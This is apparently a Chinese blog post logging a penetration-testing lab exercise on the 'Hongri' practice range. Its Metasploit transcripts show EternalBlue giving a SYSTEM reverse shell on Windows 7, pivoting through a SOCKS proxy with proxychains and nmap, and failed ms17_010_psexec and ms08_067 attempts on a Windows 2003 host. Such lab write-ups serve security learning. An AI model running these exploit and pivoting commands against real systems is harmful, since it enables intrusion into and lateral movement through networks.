继续渗透 红日靶场
|
900
|
0
|
web安全入门,渗透记录

515 字
|
14 分钟

继续渗透 红日靶场

有些时候失败的话记得 msfdb init

前言(就是前面我们用的ms17_010得到的msfshell)

┌──(kali㉿kali)-[~]
└─$ msfconsole                                     

      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx
  lOOOOOOOO.         ;d;         ,OOOOOOOOl
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.
   cOOOOOOO.   .OOc.     'oOO.   ,OOOOOOOc
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl
      ;OOOO'   .OOOO.   :OOOO.   ;OOOO;
       .dOOo   .OOOOocccxOOOO.   xOOd.
         ,kOl  .OOOOOOOOOOOOO. .dOk,
           :kk;.OOOOOOOOOOOOO.cOk:                                           
             ;kOOOOOOOOOOOOOOOk:                                             
               ,xOOOOOOOOOOOx,                                               
                 .lOOOOOOOl.                                                 
                    ,dOd,                                                    
                      .                                                      

       =[ metasploit v6.1.27-dev                          ]
+ -- --=[ 2196 exploits - 1162 auxiliary - 400 post       ]
+ -- --=[ 596 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Tired of setting RHOSTS for modules? Try 
globally setting it with setg RHOSTS x.x.x.x

msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.239.53
rhost => 192.168.239.53
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4567
lport => 4567
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.239.58
lhost => 192.168.239.58
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.239.58:4567 
[*] 192.168.239.53:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.239.53:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.239.53:445    - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.239.53:445 - The target is vulnerable.
[*] 192.168.239.53:445 - Connecting to target for exploitation.
[+] 192.168.239.53:445 - Connection established for exploitation.
[+] 192.168.239.53:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.239.53:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.239.53:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.239.53:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 192.168.239.53:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 192.168.239.53:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.239.53:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.239.53:445 - Sending all but last fragment of exploit packet
[*] 192.168.239.53:445 - Starting non-paged pool grooming
[+] 192.168.239.53:445 - Sending SMBv2 buffers
[+] 192.168.239.53:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.239.53:445 - Sending final SMBv2 buffers.
[*] 192.168.239.53:445 - Sending last fragment of exploit packet!
[*] 192.168.239.53:445 - Receiving response from exploit packet
[+] 192.168.239.53:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.239.53:445 - Sending egg to corrupted connection.
[*] 192.168.239.53:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.239.53
[*] Meterpreter session 1 opened (192.168.239.58:4567 -> 192.168.239.53:1202 ) at 2022-05-29 03:11:15 -0400
[+] 192.168.239.53:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.239.53:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.239.53:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > Getsystem
[-] Unknown command: Getsystem
meterpreter > getsystem
[-] Already running as SYSTEM
meterpreter > run autoroute -s 192.168.52.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.52.0/255.255.255.0...
[+] Added route to 192.168.52.0/255.255.255.0 via 192.168.239.53
[*] Use the -p option to list all active routes
meterpreter > arp -a

ARP cache
=========

    IP address       MAC address        Interface
    ----------       -----------        ---------
    169.254.255.255  ff:ff:ff:ff:ff:ff  24
    192.168.52.138   00:0c:29:24:b5:4d  11
    192.168.52.255   ff:ff:ff:ff:ff:ff  11
    192.168.239.33   ac:74:09:17:8a:01  25
    192.168.239.52   50:ed:3c:1f:35:98  25
    192.168.239.57   8c:c6:81:11:7e:70  25
    192.168.239.58   00:0c:29:0b:88:fa  25
    192.168.239.239  00:d8:61:ca:0c:fd  25
    192.168.239.255  ff:ff:ff:ff:ff:ff  25
    224.0.0.22       00:00:00:00:00:00  1
    224.0.0.22       01:00:5e:00:00:16  24
    224.0.0.22       01:00:5e:00:00:16  11
    224.0.0.22       01:00:5e:00:00:16  14
    224.0.0.22       01:00:5e:00:00:16  22
    224.0.0.22       01:00:5e:00:00:16  23
    224.0.0.22       01:00:5e:00:00:16  25
    224.0.0.252      01:00:5e:00:00:fc  24
    224.0.0.252      01:00:5e:00:00:fc  11
    224.0.0.252      01:00:5e:00:00:fc  25
    255.255.255.255  ff:ff:ff:ff:ff:ff  24
    255.255.255.255  ff:ff:ff:ff:ff:ff  14
    255.255.255.255  ff:ff:ff:ff:ff:ff  22
    255.255.255.255  ff:ff:ff:ff:ff:ff  23
    255.255.255.255  ff:ff:ff:ff:ff:ff  25

代理设置

注意需要backgroud一下

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i

Active sessions
===============

  Id  Name  Type                 Information           Connection
  --  ----  ----                 -----------           ----------
  1         meterpreter x64/win  NT AUTHORITY\SYSTEM   192.168.239.58:4567
            dows                 @ STU1                -> 192.168.239.53:12
                                                       02  (192.168.239.53)

msf6 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/server/socks_proxy
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 auxiliary(server/socks_proxy) > show options

Module options (auxiliary/server/socks_proxy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST   0.0.0.0          yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener
   VERSION   5                yes       The SOCKS version to use (Accepted:
                                         4a, 5)

Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server

msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a

run之后会出现 starting... ,jobs可以查看当前代理任务,如果出现stoping...,可以尝试更改 SRVHOST配置 或者 修改如下配置文件

如果proxychains配置终端代理出现问题 修改一下文件

切记打开的是/etc/proxychains4.conf
(这个因人而异吧)

#
#        Examples:
#
#               socks5  192.168.67.78   1080    lamer   secret
#               http    192.168.89.3    8080    justu   hidden
#               socks4  192.168.1.49    1080
#               http    192.168.39.93   8080
#
#
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 1080

其实添加socks4 127.0.0.1 1080

之后使用proxychains+cmd 这条命令,可以实现 使用代理执行命令,之后run

msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) > 
[*] Starting the SOCKS proxy server

出现上面这样就是正确的


msf6 auxiliary(server/socks_proxy) > proxychains nmap -Pn -sT 192.168.52.141
[*] exec: proxychains nmap -Pn -sT 192.168.52.141

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-29 03:32 EDT
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:443 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:53 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:111 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:113 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:5900 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:80 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:110 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:22 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:1025  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:554 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:1720 <--denied
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.141:993 Interrupt: use the 'exit' command to quit

渗透win2003(远程登录)

看看有没有故技重施的可能(ms17_010)

msf6 auxiliary(scanner/smb/smb_version) > set rhost 192.168.52.141
rhost => 192.168.52.141
msf6 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.52.141:445    - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)
[+] 192.168.52.141:445    -   Host is running Windows 2003 (build:3790) (name:ROOT-TVI862UBEH) (domain:GOD)
[*] 192.168.52.141:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) >

尝试永恒之蓝攻击win2003

use exploit/windows/smb/ms17_010_psexec   //windows 2003 的攻击模块
set payload windows/meterpreter/bind_tcp

但是看这个回显知道不行

msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] 192.168.52.141:445 - Target OS: Windows Server 2003 3790
[*] 192.168.52.141:445 - Filling barrel with fish... done
[*] 192.168.52.141:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.52.141:445 -        [*] Preparing dynamite...
[*] 192.168.52.141:445 -                Trying stick 1 (x64)...Miss
[*] 192.168.52.141:445 -                [*] Trying stick 2 (x86)...Boom!
[*] 192.168.52.141:445 -        [+] Successfully Leaked Transaction!
[*] 192.168.52.141:445 -        [+] Successfully caught Fish-in-a-barrel
[*] 192.168.52.141:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.52.141:445 - Reading from CONNECTION struct at: 0x8cf9cd60
[*] 192.168.52.141:445 - Built a write-what-where primitive...
[+] 192.168.52.141:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.52.141:445 - Selecting native target
[*] 192.168.52.141:445 - Uploading payload... VdQZjuZS.exe
[*] 192.168.52.141:445 - Created \VdQZjuZS.exe...
[+] 192.168.52.141:445 - Service started successfully...
[*] 192.168.52.141:445 - Deleting \VdQZjuZS.exe...
[*] Started bind TCP handler against 192.168.52.141:4567
[*] Sending stage (175174 bytes) to 192.168.52.141
[-] Meterpreter session 2 is not valid and will be closed
[*] 192.168.52.141 - Meterpreter session 2 closed.  Reason: Died

尝试关闭防火墙,继续ms17_010失败

尝试

msf6 exploit(windows/smb/ms17_010_psexec) > use exploit/windows/smb/ms08_067_netapi
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.52.141
rhost => 192.168.52.141
msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] 192.168.52.141:445 - Automatically detecting the target...
[*] 192.168.52.141:445 - Fingerprint: Windows 2003 -  - lang:Unknown
[*] 192.168.52.141:445 - Selected Target: Windows 2003 SP0 Universal
[*] 192.168.52.141:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.52.141:4567
[*] Exploit completed, but no session was created.

虽然失败了,但是win2k3有弹窗

暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇